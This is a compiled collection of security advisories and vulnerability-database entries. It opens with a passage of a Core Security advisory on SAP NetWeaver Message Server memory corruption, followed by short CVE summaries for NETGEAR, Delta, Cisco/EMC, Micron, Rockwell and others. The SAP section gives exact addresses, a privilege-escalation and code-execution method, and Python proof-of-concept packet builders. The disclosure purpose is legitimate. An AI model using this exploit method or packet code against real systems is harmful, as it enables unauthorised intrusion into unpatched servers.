.text:0044D36C add [esi+40h], ebx ; iflag=0xd,
flag=2 => add 1 to [esi+0x40]
.text:0044D36F adc [esi+44h], ecx
.text:0044D372 jmp short loc_44D39D
.text:0044D374 ;
---------------------------------------------------------------------------
.text:0044D374
.text:0044D374 loc_44D374: ; CODE XREF:
_MsJ2EE_AddStatistics+7Aj
.text:0044D374 add [esi+38h], ebx ; iflag=0xd,
flag=1 => add 1 to [esi+0x38]
.text:0044D377 adc [esi+3Ch], ecx
.text:0044D37A jmp short loc_44D39D
.text:0044D37C ;
---------------------------------------------------------------------------
.text:0044D37C
.text:0044D37C loc_44D37C: ; CODE XREF:
_MsJ2EE_AddStatistics+70j
.text:0044D37C mov al, [ebp+msflag]
.text:0044D37F cmp al, 3
.text:0044D381 jnz short loc_44D38B
.text:0044D383 add [esi+30h], ebx ; iflag=0xc,
flag=3 => add 1 to [esi+0x30]
.text:0044D386 adc [esi+34h], ecx
.text:0044D389 jmp short loc_44D39D
.text:0044D38B ;
---------------------------------------------------------------------------
.text:0044D38B
.text:0044D38B loc_44D38B: ; CODE XREF:
_MsJ2EE_AddStatistics+91j
.text:0044D38B cmp al, 2
.text:0044D38D jnz short loc_44D397
.text:0044D38F add [esi+28h], ebx ; iflag=0xc,
flag=2 => add 1 to [esi+0x28]
.text:0044D392 adc [esi+2Ch], ecx
.text:0044D395 jmp short loc_44D39D
.text:0044D397 ;
---------------------------------------------------------------------------
.text:0044D397
.text:0044D397 loc_44D397: ; CODE XREF:
_MsJ2EE_AddStatistics+9Dj
.text:0044D397 add [esi+20h], ebx ; iflag=0xc,
flag=1 => add 1 to [esi+0x20]
.text:0044D39A adc [esi+24h], ecx
[...]
-----/
And the following code excerpt is always executed within the
'_MsJ2EE_AddStatistics' function, providing two more memory corruption
primitives:
/-----
.text:0044D3B7 add [esi],
ebx ;add 1 to [esi]
.text:0044D3B9 adc dword ptr [esi+4], 0
.text:0044D3BD mov eax,
[edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully
controlled by the attacker
.text:0044D3C0 cdq
.text:0044D3C1 add [esi+8],
eax ;add an arbitrary number to [esi+8]
-----/
This memory corruption vulnerability can be used by remote
unauthenticated attackers to execute arbitrary code on vulnerable
installations of SAP Netweaver, but it can also be abused to modify the
internal state of the vulnerable service in order to gain administrative
privileges within the SAP Netweaver Message Server.
A client connected to the Message Server may have administrative
privileges or not. The Message Server holds a structure of type
'MSADM_s' for each connected client, which contains information about
that very connection. Relevant parts of the 'MSADM_s' struct type are
shown below:
/-----
00000000 MSADM_s struc ; (sizeof=0x538, standard type)
00000000 ; XREF: .data:dummy_clientr
00000000 client_type dd ? ; enum MS_CLIENT_TYPE
00000004 stat dd ? ; enum MS_STAT
00000008 connection_ID dd ?
0000000C status db ?
0000000D dom db ? ; XREF: MsSFillCon+3Cw
0000000E admin_allowed db ?
0000000F db ? ; undefined
00000010 name dw 40 dup(?)
[...]
00000534 _padding db 4 dup(?)
00000538 MSADM_s ends
-----/
The 'admin_allowed' field at offset 0x0E is a boolean value that
indicates whether the connected client has administrative privileges or
not. When a new client connects, the 'MsSLoginClient' function of the
Message Server sets the proper value for the 'admin_allowed' field in
the 'MSADM_s' struct instance associated with that client:
/-----
.text:004230DC
loc_4230DC: ; CODE
XREF: MsSLoginClient+AAAj
.text:004230DC
; MsSLoginClient+B26j
.text:004230DC cmp byte ptr [edi+0Eh],
0 ; privileged client?
.text:004230E0 jnz short
loc_4230EA ; if yes, jump
.text:004230E2 mov al, byte ptr
ms_admin_allowed ; otherwise, grab the value of the
"ms_admin_allowed" global variable...
.text:004230E7 mov [edi+0Eh],
al ; ...and save it to MSADM_s.admin_allowed
-----/
So if we manage to overwrite the value of the 'ms_admin_allowed' global
variable with a value different than 0, then we can grant administrative
privileges to our unprivileged connections. In SAP Netweaver
'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global
variable is located at '0x008f17f0':
/-----
.data:008F17F0 ; int ms_admin_allowed
.data:008F17F0 ms_admin_allowed dd ? ; DATA XREF:
MsSSetMonitor+7Ew
.data:008F17F0 ; MsSLoginClient+B62r
-----/
And the 'j2ee_stat_services' global array, which is the array that can
be indexed outside its bounds, is located at '0x0090b9e0':
/-----
.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]
.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>)
.data:0090B9E0 ; DATA XREF:
_MsJ2EE_AddStatistics+24o
.data:0090B9E0 ;
_MsJ2EE_AddStatistics+4Co ...
-----/
So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be
targeting '0x008F17C8' as the base address for memory corruption. Having
in mind the different memory corruption primitives based on combinations
of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and
'flag == 0x2' in our Message Server packet we will be able to add 1 to
'[0x008F17C8+0x28]', effectively overwriting the contents of
'0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed',
all of our future connections will have administrative privileges within
the Message Server.
After gaining administrative privileges for our future connections,
there are at least two possible paths of exploitation:
1. Of
course it is not mandatory to have administrative privileges in order to
overwrite function pointers, but considering the limitation of
targetable addresses imposed by the little granularity of the memory
corruption, some of the most handy-to-exploit function pointers happened
to be accessible just for administrative connections.
2. Modify the configuration and behavior of the server. That includes
changing Message Server's runtime parameters and enabling Monitor Mode
in the affected server.
8.1.1. *Gaining remote code execution by overwriting function pointers*
Having in mind that the granularity of the memory addresses that can be
targeted for memory corruption is not that flexible (0x48 bytes) and the
limited memory corruption primitives available, it takes some effort to
find a function pointer that can be overwritten with a useful value and
which can be later triggered with a network packet.
One possibility is to overwrite one of the function pointers which are
in charge of handling the modification of Message Server parameters:
/-----
.data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]
; function pointers associated to the modification of the "ms/max_sleep"
parameter
.data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER
<offset aMsMax_sleep, \
.data:0087DED0 offset
MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2"
.data:0087DED0 offset
MsSSetMaxSleep>
; function pointers associated to the modification of the "ms/max_vhost"
parameter
.data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset
aMsMax_vhost, \
.data:0087DED0 offset
MsSTestInteger, \ ;<-- we can overwrite this one
.data:0087DED0 offset
MsSSetMaxVirtHost>
[...]
-----/
By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target
'0x0087DED8' as the base address for memory corruption. In this case we
can use the memory corruption primitive at address '0x0044D3C1' that
always gets executed, which will allow us to add an arbitrary number
(the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]'
effectively overwriting the function pointer shown above
('ms_changeable_parameter[1].set').
After that we need to send a 'MS_SET_PROPERTY' request, specifying
'ms/max_vhost' as the name of the property to be changed. This
'MS_SET_PROPERTY' packet will make our overwritten function pointer to
be called from the 'MsSChangeParam' function:
/-----
.text:00404DB3 loc_404DB3: ; CODE XREF:
MsSChangeParam+CDj
.text:00404DB3 lea esi, [edi+edi*2]
.text:00404DB6 mov edi, [ebp+pvalue]
.text:00404DB9 add esi, esi
.text:00404DBB mov edx,
ms_changeable_parameter.test[esi+esi]
.text:00404DC2 add esi, esi
.text:00404DC4 push edi
.text:00404DC5 push pname
.text:00404DC6 call edx ; call our
overwritten function pointer
-----/
'MS_SET_PROPERTY' packets will be ignored by the Message Server if the
requesting client does not have administrative privileges, so it is
necessary to gain administrative privileges as explained above before
using the memory corruption vulnerability to overwrite one of the
function pointers in the 'ms_changeable_parameter' global array.
8.1.2. *Modify the configuration and behavior of the server*
After gaining administrative privileges for our connections, it is
possible to perform 'MS_SET_PROPERTY' packets against the Message Server
in order to modify its configuration and behavior. That makes possible,
for example, to add virtual hosts to the load balancer, or to enable
Monitor Mode [3] (transaction SMMS) on the affected server. Enabling
Monitor Mode takes two steps:
1. Send a 'MS_SET_PROPERTY' packet with property 'name ==
"ms/monitor"', property 'value == 1'.
2. Send a 'MS_SET_PROPERTY' packet with property 'name ==
"ms/admin_port"', property 'value == 3535' (or any other arbitrary port
number).
After sending the second 'MS_SET_PROPERTY' packet, the SAP Netweaver
Message Server will start listening on the specified port, waiting for
connections from instances of the msmon.exe monitoring program [4].
The following python code can be used to trigger the vulnerability:
/-----
def send_attack(connection):
print "[*] Sending crash packet"
crash = '**MESSAGE**\x00' # eyecatcher
crash+= '\x04' # version
crash+= '\x00' # errorno
crash+= server_name # toname
crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' #
msgtype/reserved/key
crash+= '\x04\x0d' # flag/iflag
crash+= client_string # fromname
crash+= '\x00\x00' # padd
crash+=
"ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd"
crash+= "\x00\x00\x00\x01"
crash+= "\xff\xff\xff\xff"
crash+= "\x00\x00\x00\x00"
send_packet(connection, crash)
print "[*] Crash sent !"
-----/
8.2.
Malicious packets are processed by the vulnerable function 'WRITE_C' in
the 'msg_server.exe' module.
The following python code can be used to trigger the vulnerability:
/-----
def send_attack(connection):
print "[*] Sending crash packet"
crash = '**MESSAGE**\x00' # eyecatcher
crash+= '\x04' # version
crash+= '\x00' # errorno
crash+= server_name # toname
crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' #
msgtype/reserved/key
crash+= '\x04\x05' # flag/iflag
crash+= client_string # fromname
crash+= '\x00\x00' # padd
crash+= "AD-EYECATCH\x00"
crash+= "\x01\x01"
crash+= "%11d" % 104
crash+= "%11d" % 1
crash+= "\x15\x00\x00\x00"
crash+= "\x20\x00\x00\xc8"
crash+= "LALA" + ' '*(20-4)
crash+= "LOLO" + ' '*(40-4)
crash+= " "*36
send_packet(connection, crash)
print "[*] Crash sent !"
-----/
9. *Report Timeline*
. 2012-12-10:
Core Security Technologies notifies the SAP team of the vulnerability,
setting the estimated publication date of the advisory for January 22nd,
2013. 2012-12-10:
Core sends an advisory draft with technical details and a PoC. 2012-12-11:
The SAP team confirms the reception of the issue. 2012-12-21:
SAP notifies that they concluded the analysis of the reported issues and
confirms two out of the five vulnerabilities. Vendor also notifies that
the other three reported issues were already fixed in February, 2012.
Vendor also notifies that the necessary code changes are being done and
extensive tests will follow. The corresponding security note and patches
are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21:
Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28:
SAP notifies Core that they will be contacted if tests fails in order to
re-schedule the advisory publication. 2013-01-22:
First release date missed. 2013-01-28:
SAP notifies that they are still confident with releasing a security
note and patches on Feb 12th as planned. 2013-01-29:
Core acknowledges receiving the information and notifies that everything
is ready for public disclosing on Feb 12th. Core also asks additional
information regarding the patched vulnerabilities mentioned in
[2012-12-21], including links to security bulletin, CVEs, and patches in
order to verify if those patches effectively fix the reported flaws. 2013-02-01:
SAP notifies that the patched vulnerabilities mentioned in [2012-12-21]
were reported in [5] and no CVE were assigned to them. Those
vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06:
Core notifies that the patched vulnerabilities will be removed from the
advisory and asks additional information regarding the affected and
patched version numbers. 2013-02-01:
SAP notifies that the security note 1800603 will be released and that
note will provide further information regarting this vulnerability. 2013-02-13:
Advisory CORE-2012-1128 published.
10. *References*
[1] http://www.sap.com/platform/netweaver/index.epx.
[2] SAP Security note Feb 2013
https://service.sap.com/sap/support/notes/1800603.
[3]
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm.
[4]
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm.
[5] SAP Security notes Feb 2012
https//service.sap.com/sap/support/notes/1649840.
[6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/.
[7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/.
[8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
ZDI-12-111 : SAP Netweaver ABAP msg_server.exe Opcode 0x43 Remote Code
Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-111
June 28, 2012
- -- CVE ID:
- -- CVSS:
10, AV:N/AC:L/Au:N/C:C/I:C/A:C
- -- Affected Vendors:
SAP
- -- Affected Products:
SAP NetWeaver
- -- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 12407.
- -- Vendor Response:
SAP has issued an update to correct this vulnerability. More details can be
found at:
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1
0-eea7-ceb666083a6a#section40
- -- Disclosure Timeline:
2011-10-28 - Vulnerability reported to vendor
2012-06-28 - Coordinated public release of advisory
- -- Credit:
This vulnerability was discovered by:
* e6af8de8b1d4b2b6d5ba2610cbf9cd38
- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8
wsBVAwUBT+yszFVtgMGTo1scAQLv/wf+MRiEiaRsMyaVgI7MTDUo9sXprBObQ6QM
yIlVyGLjwEQrO9KsUMlCj/pfLkgjcHYpCNxcrB0+6ZgtphkIQhrB3w0sj/fjRyn1
Vuugvjazu8xffqujZ2ymaQHR+toaQjeKrtWvVbaTdJI6EFuUi+qT5MrZQfRWhE2X
uqXdLphMXYH+SRhNtD+zJhxg4U4emVvirqNJa9YLwFE0UpxGRksKCB4Cx89o2QWE
NiC9bPznAVCMOBh/R/8uROXkg1Jg9YBhEu7wzJY95Yfsl4oWpSO0cQOCF0WAWiHi
TsUy3xHAjW7gMz7v/QMleok6C/7safK/7qjJRMDrGUQO1csmlZUkAg==
=FVga
-----END PGP SIGNATURE-----
|
|
var-201208-0222
|
Multiple stack-based buffer overflows in msg_server.exe in SAP NetWeaver ABAP 7.x allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) long parameter value, (2) crafted string size field, or (3) long Parameter Name string in a package with opcode 0x43 and sub opcode 0x4 to TCP port 3900. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. NetWeaver ABAP is prone to a denial-of-service vulnerability |
|
var-202307-1321
|
NETGEAR ProSAFE Network Management System MyHandlerInterceptor Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of NETGEAR ProSAFE Network Management System. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the MyHandlerInterceptor class. The issue results from improper implementation of the authentication mechanism. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19718 |
|
var-201805-1147
|
WPLSoft in Delta Electronics versions 2.45.0 and prior utilizes a fixed length heap buffer where a value larger than the buffer can be read from a file into the buffer, causing the buffer to be overwritten, which may allow remote code execution or cause the application to crash. Delta Electronics WPLSoft Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation WPLSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of dvp files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process. Delta Industrial Automation is the industry automation vendor for power management and cooling solutions worldwide. The length of the data provided by the user is not verified. WPLSoft (Delta PLC programming software) is a PLC program programming software used by Delta Electronics in the WINDOWS operating system environment. Delta Electronics WPLSoft has a heap buffer overflow vulnerability. Execute or cause the application to crash. A stack-based buffer-overflow vulnerability
2. A heap-based buffer-overflow vulnerability
3.
Delta Industrial WPLSoft Version 2.45.0 and prior versions are vulnerable |
|
var-202409-0396
|
Triangle Microworks TMW IEC 61850 Client source code libraries before 12.2.0 lack a buffer size check when processing received messages. The resulting buffer overflow can cause a crash, resulting in a denial of service. SICAM 8 Power automation platform is a universal, hardware- and software-based, all-in-one solution for all applications in the field of power supply. SICAM A8000 RTUs (Remote Terminal Units) are modular devices for remote control and automation applications in all areas of energy supply. SICAM EGS (Enhanced Grid Sensor) is a gateway for local substations in distribution networks. SICAM SCC is a process and visualization system for energy automation solutions. SITIPE AT (Automated Testing) is a computer-aided test system for integrating and simplifying functional test procedures for substation automation, remote control and protection panels manufactured by Siemens.
A buffer overflow vulnerability exists in third-party components of Siemens SICAM and SITIPE products. An attacker can exploit this vulnerability to create a denial of service condition by sending a specially crafted MMS message |
|
var-201109-0089
|
Multiple unspecified vulnerabilities in Cisco Unified Service Monitor before 8.6, as used in Unified Operations Manager before 8.6 and CiscoWorks LAN Management Solution 3.x and 4.x before 4.1; and multiple EMC Ionix products including Application Connectivity Monitor (Ionix ACM) 2.3 and earlier, Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) 3.2.0.2 and earlier, IP Management Suite (Ionix IP) 8.1.1.1 and earlier, and other Ionix products; allow remote attackers to execute arbitrary code via crafted packets to TCP port 9002, aka Bug IDs CSCtn42961 and CSCtn64922, related to a buffer overflow. Cisco Unified Operations Manager and CiscoWorks LAN Management Solution Used in Cisco Unified Service Monitor Contains a vulnerability that allows arbitrary code execution. The problem is Bug ID CSCtn42961 and CSCtn64922 It is a problem.Skillfully crafted by a third party TCP port 9002 Arbitrary code could be executed via packets. Authentication is not required to exploit this vulnerability.The flaw exists within the brstart.exe service which listens by default on TCP port 9002. When handling an add_dm request the process uses a user provided value to allocate a buffer then blindly copies user supplied data into a fixed-length buffer on the heap. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the casuser user. Multiple EMC Ionix applications are prone to a buffer-overflow vulnerability. Successful exploits will result in the complete compromise of affected applications. Failed exploit attempts will result in a denial-of-service condition.
The following applications are affected.
Ionix Application Connectivity Monitor (Ionix ACM) version 2.3 and prior
Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) version 3.2.0.2 and prior
Ionix IP Management Suite (Ionix IP) version 8.1.1.1 and prior
Ionix IPv6 Management Suite (Ionix IPv6) version 2.0.2 and prior
Ionix MPLS Management Suite (Ionix MPLS) version 4.0.0 and prior
Ionix Multicast Manager (Ionix MCAST) version 2.1 and prior
Ionix Network Protocol Management Suite version (Ionix NPM) 3.1 and prior
Ionix Optical Transport Management Suite version (Ionix OTM) 5.1 and prior
Ionix Server Manager (EISM) version 3.0 and prior
Ionix Service Assurance Management Suite (Ionix SAM) version 8.1.0.6 and prior
Ionix Storage Insight for Availability Suite (Ionix SIA) version 2.3.1 and prior
Ionix VoIP Availability Management Suite (Ionix VoIP AM) version 4.0.0.3 and prior.
Details
=======
CiscoWorks LAN Management Solution is an integrated suite of
management functions that simplifies the configuration,
administration, monitoring, and troubleshooting of a network. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products. EMC will communicate the fixes for all other affected products as they become available. Regularly check EMC Knowledgebase solution emc274245 for the status of these fixes.
Link to remedies:
Registered EMC Powerlink customers can download software from Powerlink. For EMC Ionix Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads E-I
Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045.
Credits:
EMC would like to thank Abdul Aziz Hariri working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue.
For explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831.
EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important security information. EMC recommends all users determine the applicability of this information to their individual situations and take appropriate action. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
Cisco has released free software updates that address these
vulnerabilities.
There are no workarounds available to mitigate these vulnerabilities.
This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml
Note: CiscoWorks LAN Management Solution is also affected by these
vulnerabilities. The Software
Update page displays the licensing and software version.
They provides a way to continuously monitor active calls supported by
the Cisco Unified Communications System.
Both of these vulnerabilities are documented in Cisco bug ID
CSCtn42961 ( registered customers only) and have been assigned CVE ID
CVE-2011-2738.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCtn42961 - Cisco Unified Service Monitor Remote Code Execution
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of these vulnerabilities could allow an
unauthenticated, remote attacker to execute arbitrary code on
affected servers.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Mitigations that can be deployed on Cisco devices within the network
are available in the Cisco Applied Mitigation Bulletin companion
document for this advisory, which is available at the following link:
http://www.cisco.com/warp/public/707/cisco-amb-201100914-cusm-lms.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to:
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were reported to Cisco by ZDI and discovered by
AbdulAziz Hariri.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+----------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-September-14 | public |
| | | release |
+----------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:
http://www.cisco.com/go/psirt
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)
iFcDBQFOb9w/QXnnBKKRMNARCBomAP9pCiRwCB8z3oe3IWB2XXNzeaQxAwoq0gQ4
6znwu3lLSAD/Y6o+u8AofSMxkj3THWIdpbjVXKQXMal/BhxDhN5fsI8=
=Ybok
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
|
var-202409-0304
|
Micron Crucial MX500 Series Solid State Drives M3CR046 is vulnerable to Buffer Overflow, which can be triggered by sending specially crafted ATA packets from the host to the drive controller. crucial of mx500 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state |
|
var-202408-2038
|
CVE-2024-7513 IMPACT
A code execution vulnerability exists in the affected product. The vulnerability occurs due to improper default file permissions allowing any user to edit or replace files, which are executed by account with elevated permissions. Rockwell Automation FactoryTalk View SE is an industrial automation system view interface from Rockwell Automation of the United States |
|
